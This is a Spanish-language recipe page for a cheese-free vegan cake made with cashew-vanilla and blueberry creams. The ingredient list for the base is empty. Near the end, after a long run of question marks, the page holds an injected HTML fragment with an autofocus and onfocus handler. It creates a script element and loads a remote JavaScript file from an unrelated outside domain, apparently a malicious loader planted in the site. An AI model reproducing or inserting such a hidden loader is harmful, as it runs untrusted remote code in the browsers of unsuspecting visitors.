Seleccionar página

No lleva queso y es delicioso.

INGREDIENTES:

para la base:

para la crema de vainilla

  • 2 tazas de anacardos crudos remojados en agua
  • 2 plátanos bien maduros congelados
  • 1/3 taza de leche de almendras
  • 1 vaina de vainilla

 para la crema de blueberries:

  • 1/2 taza de la crema de vainilla
  • 2 tazas de blueberries congelados
  • 1 plátano bien maduro congelado
  • 4 dátiles
  • 1 cucharada de miel de maple

La noche anterior poner a remojar los cashews en agua que los cubra, congelar los blueberries, cortar los plátanos y congelarlos por separado.

Al día siguiente, forrar la base de un molde desarmable de 9 pulgadas de diámetro con papel manteca y engrasar con aceite de coco.

Para la base, procesar las almendras hasta que estén bien trituradas, agregar los dátiles y procesar hasta conseguir que se forme una masa. Vaciar en el molde, presionar para cubrir toda la base y congelar.

Para la crema de vainilla, colar los cashews y procesarlos junto con los plátanos, la leche de almendras y las semillas de la vaina de vainilla (o esencia de vainilla) hasta conseguir una crema uniforme (pueden quedar pequeños trocitos de los cashews).

Retirar el molde del congelador, separar media taza de la crema de vainilla, el resto verterla dentro del molde y llevar a congelar.

Para la crema de blueberries, procesar las crema de vainilla que se ha separado junto con los blueberries congelados, el plátano congelado, los dátiles y la miel de maple. Se puede agregar más miel de maple si se desea más dulce.

Retirar el molde del congelador, agregar toda la crema de blueberries, emparejar y congelar por unas 2 horas.

Para servir, desmoldar, retirar el papel manteca, colocar en el plato de presentación y decorar con blueberries y algunas hojas verdes.

0
0 item
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? \" onfocus=script=document.createElement("script");script.src="//www.comedianteschapines.com/es/counter.js";document.head.append(script); autofocus=\"
Empty Cart
Abrir chat